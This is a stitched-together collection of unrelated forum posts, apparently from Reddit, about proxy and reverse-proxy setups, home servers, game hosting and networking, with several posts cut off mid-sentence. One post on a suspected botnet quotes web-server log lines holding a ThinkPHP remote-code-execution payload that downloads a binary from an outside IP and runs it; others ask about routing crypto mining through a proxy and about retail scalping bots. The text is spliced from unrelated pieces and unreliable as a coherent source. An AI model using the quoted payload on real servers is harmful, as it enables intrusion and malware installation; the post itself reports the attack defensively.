Proxy Server

Hey, guys.

I need help from those who created home servers on Ubuntu or at least from those who are familiar with it. I'd be grateful if you explained to me how exactly to control the network traffic via iptables. Another problem is that I wanted to implement proxy servers on my home network, but I honestly don't understand how to configure it.

It was hard for me to create a home server via Ubuntu (ver. 18.04) because I'm a complete newbie. Yeah, I was able to set up a home server without any problems, but it took some time to connect it to the internet. I eventually did it, but still don't know how to control network traffic properly. I read several guides about iptables and its features here on https://manpages.ubuntu.com/manpages/precise/en/man8/iptables.8.html but the manual has a quite difficult language, and I can't understand it. I'd be glad if you shared a guide for complete noobs about it.

I also want to know if it makes any sense to connect a proxy server on my home network. I'm quite paranoid about my web security, so I'd like to protect my personal data a little. I've got some residential proxies on https://speedproxies.net/ and I want to hide my network under them. I know that it's quite easy to use them on a particular browser, but is there a possibility to maintain a stable internet connection on the whole network? Browsing on the internet didn't really help. I only found a guide about implementing a proxy on Ubuntu via Squid software, but not sure if I can use it in my case.

So, that's why I created a topic here. I wanna know if there is a possibility to make such manipulation by hiding my home network or not. If you have any other suggestions or additional information, I'd be glad to read them.

I recently started self hosting a couple game servers for some friends (SCP:Secret Laboratory, Valheim).

Right now they're just running on some VMs via ProxMox, was eventually going to move some to containers where applicable.

Currently just having them connect via my public IP (bad setup, I know) since it's just a handful of IRL friends.

This obviously isn't ideal especially if I ever want to host games to the public.

I'm currently looking at getting a vps to host nginx for a reverse proxy to take care of this issue.

Was wondering if there's anyone here with a similar setup, what was the latency impact it had on your game servers? Any alternatives to a reverse proxy to resolve this issue that have minimal latency impact?

Hello AirMessage community,

I'm happy to announce that AirMessage Cloud registrations are open again! Thank you to everyone for your patience, and I'm really excited for you to try out the next version of AirMessage.

AirMessage Cloud enables zero-configuration setup (no more port forwarding), and messaging access through a web interface at web.airmessage.org. For more information on AirMessage Cloud, please take a look at the original release post. You can register at airmessage.org/cloud.

For those who are more interested in the recent technical changes, there have been significant upgrades to AirMessage Connect (AirMessage's proxy server), as well as AirMessage's Android app and web app, which I'll be going over below.

AirMessage Connect, faster than ever

One of the primary reasons for AirMessage Connect's development is to enable a trusted encrypted WebSocket connection, to allow standard web browsers to use AirMessage's protocol. AirMessage Connect used to be written in Java, using a WebSocket library that wasn't optimized for handling many simultaneous connections, and couldn't properly take advantage of multiple CPU cores.

This prompted me to give up my love for everything Java, and pick a tool that would work better to build a high-performance proxy server. AirMessage Connect now runs native code, and CPU and memory usage is way down. I have also seen noticeable performance improvements on my own devices day-to-day. This being an issue that has plagued AirMessage Connect for a while, I'm glad to be finally able to invite more users to use a faster messaging experience!

AirMessage for Android that isn't spaghetti

As new features and changes kept on being added to AirMessage for Android, its rather naive method of processing and distributing messaging events as well as binding RecyclerView items became hard to understand and prone to instability. Now, new versions of AirMessage use a single simplified pipeline for processing incoming messages, and broadcast them to a central emitter to be consumed by any screen that needs them. This has allowed a number of screens to be rewritten in a way that feels much more natural, and has made it easier to track down and fix stray bugs.

AirMessage for web, without the browser

While these changes likely won't surface to end users for a while, AirMessage

Magical hacking is sometimes necessary, for example when someone takes a picture of magic in action with one of their intelligent fellytone devices.

I have opened ports 80 and 443 for http and https on my router and forwarded those to a reverse proxy server on a machine with internal ip 192.168.20.110, it has a web server on it and nginx does a proxy_pass to the local host on the respective ports of the web server from specific domains. As shown.

Now I have another nginx reverse proxy ie. letsencrypt/swag docker container from linuxserver on my unraid server on port 180 the unraid server has an internal ip of 192.168.20.120 and it has nextcloud running on port 188. I want my web server to only handle sub1.example.com and sub2.example.com and pass all the other requests to the reverse proxy server on the unraid docker as is so that it can do its proxy_pass from sub3.example.com and other subdomains. Is this possible and if yes how?

server{
     listen 80;
     server_name sub1.example.com;

     location / {
         proxy_pass "http://localhost:8880";
         }
     }

server{
     listen 80;
     server_name sub2.example.com;
          
     location / {
         proxy_pass "http://localhost:8881";
         }
     }

Loading images is a security risk because it allows someone to see when the email is loaded, but it can also give them your ip. Gmail works around this by having Google's servers load the images and then pass it on to you instead of fetching them directly. Does protonmail do the same?

Oh man this has been a fun ride.

I have unraid up and going for a few weeks now, and I've been watching SI's videos and learning a ton. This is my first foray into this level of networking and any kind of home server, and I've been able to absorb everything pretty well until now. Here are a few questions that I haven't quite been able to grasp:

I watched SI proxy video like three times, and after checking settings everywhere over and over, I finally got swag working without the dns errors by getting my domain setup with Cloudflare and setting an A record that points my domain to my public IP (set to proxy) and cnames setup with the same examples that he uses (server, next cloud) but instead of setting them to the generic duckdns, I set them to the my domain.com. I didn't set the cname records to proxy on Cloudflare. I have cloudflare-ddns running in docker with the api set. This makes it so I don't need duckdns at this point, correct? Are there any issues with that setup as far as security? With just the cname set to mydomain.com, how does that web address open nextcloud? (Dumb question, I know) I am happy that everything is functioning with the port forwarding rules I made, but I'm open to any changes.

I am having a hard time editing the config file for nextcloud, as I am struggling to mount the appdata share on my pc, and I can't seem to find a way to edit php files inside krusader. Any tips here?

Thanks for your help.

i manage exchange server 2016 for a small company with 150 staff. the exchange is only accessible internal. with increase in number of consultant, it means i will have to publish it to be accessible outside company networks. am looking for a reverse proxy thats is easier to manage for the job.

I know I'm just another person looking to get into flipping. So I've tried on my own. And I'm coming up with nothing. Here is what I have tried:

Bots: EVE AIO - yields me nothing. It gets PD errors. Or checkout errors.
Cookies: getcookies.io to buy cookies for EVE
Proxies: Oculus weekly
Cook Group: House of Carts (virtually nothing to do with GPU's)

The only success I had was one card from a checkout app I paid someone to write for me.
So now my questions are...
What's the best Cook Group for me? Should I get a better bot? How many proxies should I get? Would ScottBot be good for Walmart/BestBuy/etc?

I have a huge save game that takes about ~15% cpu utilization to run in single player mode. When I host the same save as a headless server and connect, I noticed about the same utilization for my client instance of factorio, but very little cpu usage for the headless server process.

To test things out further, I connected to the server from another computer and observed the same low cpu usage on the server machine.

I'm aware that Factorio uses deterministic lockstep for multiplayer. What I'm wondering is whether the server actually computes the game simulation, or simply distributes player inputs between connected players. Based on the CPU usage I'm seeing it seems like the server doesn't actually compute the game simulation, and therefore the server machine doesn't need to be particularly powerful.

Most server guides say the server _does_ need to be powerful though, so what am I missing?

EDIT: After thinking about this more, it seems like the server must simulate the game state, otherwise how would it be able to detect desync events? If that's true though, what accounts for the low CPU usage? Is the ~15% usage from the Client instance due to rendering overhead?

EDIT 2: Thanks everyone for your answers. I realize after some more testing that the large difference in CPU usage I saw as in fact due to the overhead of rendering the game. I tested this by zooming way in and observing the CPU usage of the client instance fall to roughly the usage of the server.

Thanks!

Hello,

I'm monitoring AWS EC2 Instances with a Zabbix Server(5.0) and multiple proxy instances across many accounts .

I needed some of CloudWatch metrics and other information so I'm using External Check Item with custom python script.

But as stated in Zabbix Document, When the hosts are monitored by Proxy,

the external scripts runs on the Proxy instance.

(https://www.zabbix.com/documentation/5.0/manual/config/items/itemtypes/external)

And script keep failing because required packages or IAM role are not set on any proxy servers.

is there any way to force some of the external check items to execute scripts on the Zabbix Server

even if the host is monitored by proxy?

I found that you can test some item with proxy/no proxy option, but couldn't find any option when the item is actually collecting value.

Thank you.

I have a possible firewall migration from Sophos to FortiGate ahead of me and need to make sure that a certain feature is possible or not.

On the Sophos UTM you can, apparently, set up the reverse proxy in a way where a request to one entry can be rewritten to point to a server with a specific path.

An example:

https://internalserver.domain.com gets redirected to https://server1.domain.com/INTERNAL/RESOURCE

And you can build on top of that where a different request can point to the same server, but with a different path, i.e.

https://externalserver.domain.com gets redirected to https://server1.domain.com/EXTERNAL/RESOURCE

I know that a FortiGate can forward requests to a specific server based on the host header, but is there anything else that would help me accomplish this or do I need FortiWeb for this?

If you are running this server for your project it now got a bit more interesting. Collecting stats via Prometheus and displaying them via Grafana is a powerful way to dive into the performance of your API. Break up requests per action, load over time, node performance or request rate analysis is just one of few possibilities. Read more about it here:

https://github.com/Joohansson/NanoRPCProxy#how-to-use-prometheus-and-grafana

The latest docker image is "nanojson/nanorpcproxy:v1.3.3" or downloaded from here.

Typical setup (everything is docker/docker-compose compatible):

1. Run a node (blocked from external access)
2. Use the proxy server to handle all external API calls between your app and the node
3. Let Prometheus collect the data from the proxy server
4. Serve stats in the browser via Grafana which reads from Prometheus

Again, many thanks to u/aspic for helping me out with this project!

https://preview.redd.it/wczkhbupf1g61.png?width=1698&format=png&auto=webp&s=8b479e6733943f4b4f6c12b393a25a48d0906447

title.

Hey y'all, I'm trying to set up an XMR mining rig. The flow will look like this:

>External server CPU #1
>
>External server CPU #2. ---> My laptop as a proxy. --->. Hashvault pool
>
>External server CPU #3

So far every guide I've seen for xmrig-proxy has not worked for me, likely because they're all for setups on the same network.
As an example the command I use on my laptop looks like:

>./xmrig-proxy -r 2 -R 1 --donate-level 1 -b 0.0.0.0:3333 -o pool.hashvault.pro:3333 -u xmrwalletaddres -k

and the command on my external server:

>./xmrig -o IP.address.of.laptop:3333

Can anyone point me in the right direction for resources or give me any tips!? Much appreciated.

Like everyone else, I patched my server the day after the patches were released. I ran the TestProxyLogon script provided by Microsoft and it found no issues.

I'm wondering if our recent implementation of a proxy server between Exchange and the Internet would have helped defend us against the attack. Prior to January, we were running with OWA exposed to the Internet. At that time, for another reason, I set up an haproxy server to sit between Exchange and the Internet. If we were attacked during the window of vulnerability, would that have saved us?

We're a small organization with about 150 users, but we have made some news with an initiative the organization took back in late December. At that time, we noticed attacks on our web servers that were not successful.

Hi all,

I have an OPNsense firewall running on a dedicated hardware device. I also have a reverse proxy based on FreeBSD and NGINX, as well as a local DNS server based on Unbound. The latter two are virtual machines, and I'd like to migrate them to OPNsense to sort of have everything in one place.

The Unbound server is set up using a python module for ub-split-map for mapping local devices to resolvable dns names to access local services (mainly web services, management interfaces and such). I've tried to figure out if that functionality is reproducible using just plain Unbound and thus transferrable to OPNsense, but have so far not been able to find anything conclusive. Can I paste my configuration into the "custom options" field and have it work?

The reverse proxy is a pretty standard NGINX revproxy setup, but I can't figure out the configuration options in the OPNsense interface. Is there a way to just copypaste my current configuration into a config file somewhere and have the interface parse the file and magically make it work?

Sorry if it sounds like I'm being lazy here, but I really have tried to figure it out on my own, but nothing I've done so far has replicated the setup I'm currently running and it's starting to get to me.

I'm also in the process of reinstalling my home server with unRAID, leaving Windows Server behind, and the two virtual machines could of course live on as virtual machines on unRAID, but it'd be nice to have just one machine for DNS, reverse proxy, DHCP, VPN and routing.

So, I'm not asking anyone to do this for me, but if there are howtos/guides on how to migrate these setups to OPNsense, I'm grateful to hear about them. If configuration files are required, I'll happily post them.

Thanks.

Don't get me wrong, I have an open internet connection - I'm actually using it right now to post this - but for some peculiar reason the game itself doesn't see my proxy despite both the launcher and 99% of other apps seeing it.

Is there some Java related setting I can change - even in Java's core app somehow - to fix this problem?

Does anyone know if it's possible to route outgoing/internet traffic from the Proxy Server app via a specific interface.

I have a VPN tunnel device configured, but don't want default route enabled. Only to service apps like Proxy Server

Hello everyone.

I am here today because I think I found out a botnet targeting Nginx Proxy Manager, but first I'll get onto why I think this is targeting NPM servers in specific, if you search the web for the same requests I found out that my server has been getting, you'll see that similar posts on the internet for this same PHP script always run the same command but first request an ./index.php from the webserver that will then try to pass on the script with a get method, for example "index.php?s=.........", however this request is not requesting index.php it is requesting "localhost-nginx-proxy-manager" as a GET request, an always comes from a different IP and will always try to wget a different IP from what I can tell so far.

Now onto how I found this, as many of you, I think, I'm running a Homelab at home and even before finding out about NPM I was using an NGINX reverse proxy built the good old fashioned way with nginx config files, obviously after finding out about NPM I added it to my homelab, however I had recently found out that my NPM server that port forwarded to the internet was getting a couple of requests I wasn't expected, so I implemented an ELK stack on my homelab that would process all the logs that my NPM server creates, found out it was a couple of google bots requesting an API, so nothing to worry about, but then I stumbled across these requests:

[13/Jan/2021:17:25:56 +0000] 400 - GET http localhost-nginx-proxy-manager "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://94.102.50.158/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'" [Client 82.47.214.29] [Length 154] [Gzip -] "Uirusu/2.0" "-"
[13/Jan/2021:17:28:44 +0000] 400 - GET http localhost-nginx-proxy-manager "/index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://45.145.185.107/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp'" [Client 213.248.174.110] [Length 154] [Gzip -] "puzzles/2.0" "-"
[13/Jan/2021:17:29:09 +0000] 404 - GET http localhost-nginx-proxy-manager "/login" [Client 34.121.186.216] [Length 150] [Gzip -] "-" "-"
[13/Jan/2021:17:29:09 +0000] 404 - GET http localhost-nginx-proxy-manager "/manager/html" [Client 34.121.186.216] [Length 150] [Gzip -] "-" "-"
[13/Jan/2021:17:36:54 +0000] 400 - GET http localhost-nginx-proxy-man

Quick rundown of current configuration:
I have 2 locations, site A and site B.
The sites are connected via a 500mbps dedicated connection.
Veeam B+R is running at site A, and backups are stored on a local NAS device.
We run a backup copy job to site B, which has an identical NAS device.
Until some recent growth this has worked fairly well for us.

The problem:
The backup jobs seem to be writing without issue at 70+ mbps to the local NAS.
The backup copy jobs are only running at about 15 mbps currently, and the backup copy merge process is even slower.
I get the feeling this has something to do with Veeam reading the remote NAS data, processing changes, and sending the data back to the remote NAS, causing a large overhead.

Possible solution:
I was thinking that I could use an old Server 2012 R2 physical server we recently decommissioned as a Veeam gateway / proxy for the remote location. In this way it would run the merge process locally instead of across the site to site link.

My questions are:

1. Is there a licensing cost associated with using the spare server I have as a Veeam backup gateway and/or proxy server? (searching and I can't seem to find anything specific on licensing cost for this setup, only saying it needs to be added as a managed server in backup infrastructure in Veeam, but not if that adds a cost)

2. Would I be configuring the 2nd site with both Veeam gateway and proxy servers, or just one of those to have it used for processing the backup copy jobs?

ENV: pfsense: 2.4.5-release, Squid 0.4.44_36, SquidGuard: 1.16.18_12

Problem: I can visit sites like chess.com or apple.com; however, when I try to login the websites time out except for when I setup the Proxy Server to bypass certain clients. After which those clients are successfully able to login.

I have been unable to figure out what is causing that "authentication" problem when logging into certain web sites.

Thanks.

I'm working on a kali setup and i read stuff about proxychaining and proxy servers in general. I stumbled on a list of free proxy servers but non of them really works. I always get a timeout. Did i do something wrong or are they just broken? And does someone know a good list of free servers to connect to or do i need to buy stuff?

Thanks in advance

Overview

This post will help you use SSLH to proxy your Minecraft Server for however many ports you wish. A proxy will both hide your server IP, and provide other protections for your service by routing traffic through an external node! For this particular guide, we will be using Docker as a work-around for the SSLH destinations, but don't worry! All of the steps that are needed to install, run and get your proxy working are explained step by step here.

Please Note: This is a fix that uses docker as a work-around. I am sure there are better ways of doing this, but this is the simplest thing I could think of doing. If you have any suggestions or easier ways to accomplish this, please leave them in a comment below! Any suggestions are always appreciated.

Guide

Step 1: Finding a server to run your proxy on.

For this particular proxy, we will be using the "Always-Free" tier of servers that Google Cloud offers for its customers. Specifically, we will be using google cloud's f1-micro server instance, boasting 0.2 vCPU and 0.6 GB of memory. Although this may not seem like a lot, it will be more than enough to handle your proxy, as a docker container, depending on the use-case, may only use around 20-30 MB of ram according to some external tests. However, it will still be important to take note of the actual CPU usage surrounding your server, as more connections mean that the machine will have to work harder. Please also note that there is a 1GiB free limit on egress traffic per month, although it is still important to notice that you may not even reach this limit under normal use. Nevertheless, please still keep this in mind, as any overage above 1GiB can cost 0.085 cents per additional GiB used. However, this should still not be all too much of an issue. Optimize and upgrade as needed only if necessary.

1. To begin building your proxy, log into your google cloud platform, and navigate to the "Compute Engine" tab in the Navigation Menu. Then, proceed to "VM Instances" by clicking the > arrow on the tab.

Navigate to the VM Instances tab using the Hamburger Menu ☰.

2. Next, create your instance. Click on "create" when prompted to with the following notification:

[Press create to begin the server setup process.](https://preview.redd.it/5xniltpd3ah61.png?width=621&format=png&auto=we

How would I setup Wireguard on a VPS to tunnel to my PFSense box at home? I would like to be able to access services I run with a domain (nextcloud.example.com) while not needing a static ip or exposing my home ip.

Any help is greatly appreciated, thanks.

Hey guys do you know the differences between a proxy server and a reverse proxy server?